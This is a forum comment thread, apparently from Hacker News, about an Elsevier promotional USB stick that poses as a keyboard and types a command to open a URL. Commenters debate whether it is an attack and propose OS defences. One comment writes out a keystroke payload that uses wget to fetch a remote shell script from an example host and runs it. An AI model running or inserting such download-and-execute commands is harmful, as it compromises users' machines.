Elsevier, that just freaked me out
swaldman.dreamwidth.org
swaldman.dreamwidth.org
[2] https://media.blackhat.com/bh-dc-11/Larimer/BlackHat_DC_2011...
Elsevier knows this is an attack. They published a book titled "Seven Deadliest USB Attacks", by Brian Anderson. So they can't claim this wasn't done knowingly.
Has anybody found out what the attack does?
[1] http://www.elsevier.com/books/seven-deadliest-usb-attacks/an...
Say you'd post a persistent XSS to a forum, but only use it include Fartscroll.js, is that an attack or not? Cause I consider that to be pretty much the same category as the "surprise" automatic typing USB thing.
This weekend actually I used a USB device where this was in fact the intended behaviour: a barcode scanner. It registers as a keyboard and just types the numbers (or string) of whatever it scans. Very clever idea because it makes it very easy to write apps for, you don't need a driver or anything. Except I had momentarily forgotten that was how it works, so it surprised me anyway. Fortunately the numbers didn't do much in the program I had focused but still, that feeling of something else unexpectedly typing on my computer! Yeah if it had sent global keyboard shortcuts in order to make my computer start applications and load webpages, I'd be pretty pissed.
If the user's expectation when handed a thumb drive looking USB device from a big company is that it will display files, and instead it just pretends to be him and controls his computer interface, for me it is at least a gray area regarding computer abuse. But I am not a lawyer.
What exactly makes this an attack? I don't see it doing anything malicious. And in any case, how is plugging in a keyboard to your computer not authorizing it to send keypresses?
It appears to be a keyboard emulator that simply types winkey+R http://[some URL]
It's (sadly) a well-known fact that all unknown USB devices should be considered malicious unless proven otherwise. This is why there are so many things like http://www.umbrellausb.com/
See stuxnet: http://arstechnica.com/security/2014/07/this-thumbdrive-hack...
Put a few in different areas around work and wait for the magic to happen.
Instead of screaming a few seconds after being plugged in, perhaps it should silently charge whenever plugged in, and then scream only when unplugged. The only way to silence it is to plug it in again, or smash it to little bits.
If you are having fun with anthropomorphic social engineering, you might even have the scream be a loud but plaintive "Help me! My batteries are dying! Plug me in, plug me in, find the nearest air gapped computer and plug me in!".
Screamers are 100db+. To get that you have to drive a piezo at about 100V near it's maximum resonance point and engineer the case to create a resonant cavity.
To generate that voltage, you're likely going to need an autotransformer. And nobody stocks these off the shelf--they're a custom order magnetics part. (If you find a better circuit topology or a place that stocks the appropriate autotransformer, do please let me know.)
Of course, if you just want a wimpy beep, there's lots of options. :) But if you want something offensively loud, you're going to find that there is more engineering here than you think.
It's a good project, but it isn't "easy".
http://www.picbasic.co.uk/forum/showthread.php?t=16855 http://www.instructables.com/id/How-to-make-an-Arduino-drive...
Quibble2: stuxnet was thought to have been spread using a Windows Explorer exploit. Also not BadUSB...
Someone could hook up those ports with a new cable, but at that point they could also just open the case and bypass the glued port.
Seems you could have an OS feature so when you insert a USB device it first confirms you're happy for the device to register as an X (mass storage, input, audio etc) before it lets it do it.
Perhaps an extension to USB that has 512-bits worth of persistent storage per device. When you register a device the OS produces a random number and writes it and saves the list of allowed IDs.
Or perhaps you could ask the OS to only apply the ask to register feature to certain USB ports?
White-list the USB keyboard when it is first attached, using its unique serial number, and avoid a prompt in the future.
If you say Y here, a new sysctl option with name "deny_new_usb"
will be created. Setting its value to 1 will prevent any new
USB devices from being recognized by the OS. Any attempted USB
device insertion will be logged. This option is intended to be
used against custom USB devices designed to exploit vulnerabilities
in various USB device drivers.One would assume that "garbage in iSerial" is workaround for Windows' behavior of identifying devices by either it's serial or physical port and requiring distinct driver registrations for devices that are "different" according to this logic.
Advanced protection/admin features left to consumers simply don't work, I thought we understood that by now. You must have something that will intelligently handle them on its own (e.g. heuristic AVs, smart firewalls etc). Because there is no way for a system to say "well, this looks like a storage device, but it's telling me it's an input one, something is fishy", you're just going to have a whitelist nobody really uses, like IE's "trusted sites" zones.
Yes. Bugs in the kernel part parsing the USB descriptors IIRC were one of the avenues in PS3 jailbreaking.
Does anybody know if some platform like this exists? I heard you could do it with the BeagleBone?
Plug in a microUSB device and it can only charge; you have to hit the button in order to enable the data pins.
But I think this is designed for risks going the other way, i.e. to protect your cell phone from data-scraping USB-A female ports in airports and the like.
It's a somewhat efficient way to distribute a gigabyte of data to a hundred people so that they all have access to it now despite all sharing a lousy wifi at a conference center.
The jimrandomh's idea very interesting. The only problem is defining what is the user's login password, but I'm sure it can be solved.
Maybe even don't go with any keyboards to start, only a mouse and an onscreen keyboard and all others have to be approved.
I wonder whether it's smart enough to adapt its keystrokes for non-Windows platforms, or whether it just does random things to peoples' computers in that case?
It's mentioned in the comments.
How would you ever use one of these things as a guest on a computer (eg at a library kiosk)
Because this makes USB an absolute NO in some environments (and for quite a while now).
It would be nice if we could use USB again at some point…
No, it will not be fixed. There is no vulnerability. We need to plug in keyboards, and if users are willing to plug random devices into the ports where their keyboards lie, those peripherals can inject keystrokes.
We can play whack-a-mole and blacklist the vendor/product IDs (like systemd does), but if this were a real attack and not a stupid marketing stunt, the device would just present itself as some popular cheap keyboard and there'd be no way for the computer to tell it apart from one.
There are many other ways you could attack USB or other connectors if you get a user to plug your hardware in there, most are more involved than this one. The only solution is to educate people to not plug hardware they don't trust into their machines.
“We just need to educate users about passwords” “We just need to educate users about how to verify SSL certificates” “We just need to educate users about how to install only software from trusted publishers” etc.
This reaction is understandable but it's a non-starter if we ever want to make meaningful progress on security. The underlying problem here is that everything local was assumed to be trustworthy and that's not true and, thanks to reflashable firmware, not even something which can be assumed to stay true even if it happens to be the case when you start.
Fixing problems like this will require changes – X-Istence mentioned OS prompting for new device classes, which would particularly effective on devices like laptops (i.e. the default for most users) which could require confirmation on the built-in hardware any time an external device tries to duplicate built-in functionality (keyboard, mouse, network, etc.), but we probably need more ambitious measures like adding a public-key exchange for certain device classes or a hardware switch which controls whether a port is allowed to control the computer or provide block storage but not both.
The one thing which is certain is that the .gov / .mil security people who seal ports with epoxy aren't looking as paranoid these days…
Hobbyists would have to run their system in an insecure mode, though and it's a whole new story if a certificate-based system would actually work in a market as volatile as USB peripherals.
So, I don't think there's one magic bullet but it's far too silent on that front!
A reasonable criticism is that this would likely result in several examples of customers being screwed when SmallCorp Inc. loses control of their signing key, it's used to sign malware, and the revocation takes out all of the legitimate users but that's arguably an unavoidable cost of the industry maturing.
You likely also would need a way to update the key or flash new firmware and, possibly, a way for the updater to detect whether the device it is talking to has been tampered with. That's expensive for low-margin products such as USB sticks and mice.
Also, the average user would not know how to update the firmware, and even if he knew, might not be able to because his keyboard and mouse are fried.
A lot of people seem to think that this was a device with hacked or other illegitimate firmware. It was not. It was a device called a WebKey, which is available from a number of vendors and is intended to do exactly what the author is describing.
Is it a dumb product? Yes. But this is not any kind of firmware exploit. It's just a keyboard that doesn't look like a keyboard, some as a YubiKey or one of several other sorts of non-keyboard devices that present as keyboards.
Signatures become relevant due to what will inevitably happen if those safeguards become common: right now someone is selling devices like this to marketing people. If Windows 11 breaks that with a permission check, the companies have the choice of either dropping that product or changing it to pretend to be a Microsoft USB keyboard on the whitelist. If it's some fly-by-night marketing services company in China, there's limited recurse to go after them unless you have a lever such as being able to revoke signing keys.
Basically a patch was offered that would lock a computer if a new device was plugged in. This to counter act police mouse wigglers etc.
But Poettering decided that no that was too heavy handed, lets instead black list the specific product id. Never mind that changing a product id is a firmware flash away (one could probably make a wiggler that randomize its id on each insertion).
What if the battery dies in my wireless keyboard, and I need to plug in another one temporarily? How could I possibly type in the password at a lock screen with one dead keyboard and all new keyboards forbidden?
I'm being cheeky but any good lock screen should have an onscreen keyboard button.
And it should only need to do it the first time you plug it in.
----
USB device: hi computer i'm a new usb device, i can provide keystroke input
computer: that's a little weird, I already have a keyboard. hey user, do you really want two keyboards at once?
user: wtf no
computer: cool. sorry, usb device. no keystrokes from you.
----
USB device: hi computer I'm a new usb device, I can do keyboard input and provide mass storage
computer: that's a weird combination there buddy. hey user, does this sound cool?
user: weeeird, hmm, yeah how about mass storage so I can see what's on this thing, but no keyboard input.
computer: a pox upon your possibly-suspicious data, my hot-pluggable friend! but tell me about your filesystem.
USB device: hey here are some keystroke events anyway
computer: I'm not listeniiiiiing plus I just told on you to the user
USB device: curses, foiled again
----
USB device: hi computer I'm a new usb device, I can do keyboard input and provide mass storage
computer: that's a weird combination there buddy. plus i already have a keyboard plugged in. oh wait the user said you were okay and told me to never ask again.
USB device: cool
----
USB device: hi computer I'm a new usb device, I can do @$T%^&#R&ssnhf^23&298>>>
computer: that's a nice buffer overflow you have there, darling. take me, I'm yours!
USB device: p0n'd. here's a payload!
user: huh, that usb key I found in the parking lot of the nuclear plant doesn't work. Oh well. throws it away
payload: all yr base belong to us
----
Obviously "not plugging untrusted hardware into their machine" is still useful. And users often just say 'okay' to everything anyway. But "a weird thing is happening, are you cool with this?" would be a nice line of defense.
Uh, even a prompt like "A new keyboard was added, do you wish to use it?" would work (after the system is up and there is already an input device). Yes you can come up with edge cases, but it should be easy enough to detect the difference between someone trying to get a keyboard working versus someone going about their day and a new USB device showing up as a keyboard.
Solution to what problem? If the problem is "people keep getting hacked by plugging things into USB ports" then there are lots of other solutions. Filling in the USB ports with glue works well.
If the problem is "we need a way to plug in hardware easily without introducing security vulnerabilities" then educating people doesn't help at all.
What we need is for the OS to ask the user what to do if an existing keyboard/mouse already exists, with a way to whitelist the new device so that we don't have to repeat the same steps each and every time we reboot our computers, or unplug/replug the device.
This way it will stop these sorts of attacks.
With a bit of refinement it could contribute to the overall solution.
The responses here are also interesting: https://news.ycombinator.com/item?id=10203913
IANAL.
http://hakshop.myshopify.com/products/usb-rubber-ducky-delux...
just contributing something of interest.
Oh hey my free USB device helpfully made me go to a webpage without warning and without permission, these guys are wizards and deserve my custom.
http://ecx.images-amazon.com/images/I/811LzsR6HGL._SL1500_.j...
https://www.youtube.com/watch?v=aSLEq7-hlmo
And yes, you totally can detect operating system, bypass HID protections, and deliver custom weaponized payloads in the form of scripts catted into the command prompt.
Seems like a juicy target for a hack on the server side.
There have been worms that spread through autorun and shell exploits, but I think that's a secondary concern.
They were to build a device using a teensy that starts up a webpage once plugged in. It needed to work on major OSes and *nix systems. Win7/8/10, OSX, Ubuntu.
This was for some conference as well where they were to be used...
http://blog.opensecurityresearch.com/2012/10/hacking-usb-web...
Could be a fun weekend project.
tl;dr don't plug unknown things into your computer.
Separate built-in device, or specific signal sequence inputtable on the IME the device registered itself as e.g. if you plug in something which advertises itself as a keyboard, the system sandboxes it and asks that you input a specific password which it displays; for a pointing device it might ask you to move the pointer to specific places and click on them.
Allowing the first keyboard after boot by default seems not unreasonable. It would still make it possible for evil maids to plug in something and wait for you to boot up again, but they are difficult to protect against anyhow. This would also avoid the hassle of vouching for your keyboard every time you reboot.
Then for any USB input device that's plugged in another physical socket (e.g. where you'd plug things that you believe are just mass storage) the OS can require acknowledgement from the user before it is connected and allowed to send input data.
But this would still work on my machine, right? (I mean that the key combo would be entered; it might not actually bring up the web page, depending on my setup.)
ALT+F2 wget http://example.com/badscript.sh && chmod 755 ~/badscript.sh && ~/badscript.sh &
Which is not so good...
You can probably also learn a bit from the timings of specific actions by the host, but as long as there is any sort of automounting, I suppose that’s the best way to find out your host OS.
Both clever and reprehensible.